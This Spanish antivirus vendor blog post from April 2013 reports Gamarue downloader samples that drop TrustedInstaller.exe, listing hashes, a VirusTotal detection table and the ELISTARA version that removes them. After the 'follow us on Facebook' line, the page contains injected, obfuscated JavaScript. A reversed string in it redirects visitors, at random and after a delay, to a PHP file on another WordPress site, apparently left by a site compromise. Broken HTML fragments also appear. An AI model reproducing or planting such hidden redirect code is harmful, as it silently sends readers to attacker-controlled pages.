PACK DE MALWARES QUE GENERAN DOWNLOADER GAMARUE
Recibimos varios ficheros que generan un downloader, que posteriormente descarga un Fake Write
Dichos ficheros son los siguientes:
to-de-malwares.jpg” width=”586″ height=”173″ />
y el fichero que generan ha resultado ser el TRUSTEDINSTALLER.EXE, que pasamos a controlar, igual que el nuevo FAKE WRITE que descarga, a partir del ELISTARA 27.39 de hoy
El preanalisis de virustotal de este GAMARUE es el siguiente:
SHA256: 47671eaa738ba41a25616db8f1020ab738662a019edeffd240e99983ba469372
SHA1: 50f661604445eda44eb0b5208e7402eeb255c049
MD5: ab981df9f4cf57feb4dc35fa5a3ac473
Tamaño: 221.5 KB ( 226823 bytes )
Nombre: TrustedInstaller.exe
Tipo: Win32 EXE
Detecciones: 29 / 46
Fecha de análisis: 2013-04-03 11:10:41 UTC ( hace 0 minutos )
0 1 Más detalles Análisis File detail
Información adicional Comentarios Votos
Antivirus Resultado Actualización
Agnitum Trojan.Agent!c2OXV+jPAkI 20130402
AhnLab-V3 Dropper/Win32.Agent 20130402
AntiVir TR/Graftor.75972 20130403
Antiy-AVL – 20130403
Avast NSIS:MalOb-A [Trj] 20130403
AVG Generic_r.CBH 20130403
BitDefender Dropped:Trojan.Agent.AZFY 20130403
ByteHero – 20130322
CAT-QuickHeal Trojan.Agent.gen 20130403
ClamAV – 20130403
Commtouch W32/Backdoor.UBBS-6058 20130403
Comodo – 20130403
DrWeb BackDoor.Andromeda.22 20130403
Emsisoft – 20130403
eSafe – 20130328
ESET-NOD32 probably a variant of Win32/Inject.JICYWAE 20130403
F-Prot – 20130403
F-Secure Trojan.Agent.AZFY 20130403
Fortinet W32/AutoRun.AAEX!worm 20130403
GData Dropped:Trojan.Agent.AZFY 20130403
Ikarus Trojan-Dropper.Agent 20130403
Jiangmin – 20130331
K7AntiVirus Riskware 20130402
Kaspersky UDS:DangerousObject.Multi.Generic 20130403
Kingsoft – 20130401
Malwarebytes – 20130403
McAfee W32/Autorun.worm.aaex 20130403
McAfee-GW-Edition W32/Autorun.worm.aaex 20130403
Microsoft Worm:Win32/Gamarue.I 20130403
MicroWorld-eScan – 20130403
NANO-Antivirus Trojan.Win32.Andromeda.bltnay 20130403
Norman Suspicious_Gen5.RAMN 20130403
nProtect Dropped:Trojan.Agent.AZFY 20130403
Panda Trj/CI.A 20130402
PCTools Backdoor.Trojan 20130403
Rising – 20130403
Sophos Mal/Generic-S 20130403
SUPERAntiSpyware – 20130403
Symantec Backdoor.Trojan 20130403
TheHacker – 20130402
TotalDefense – 20130403
TrendMicro TROJ_GEN.RCBCDCT 20130403
TrendMicro-HouseCall TROJ_GEN.RCBCDCT 20130403
VBA32 – 20130402
VIPRE Trojan.Win32.Generic!BT 20130403
ViRobot –
Dicha version del ELISTARA 27.39 que lo detecta y elimina estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 3-4-2013
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-de-malwares.jpg”><img class=){kind=link}
Los comentarios están cerrados.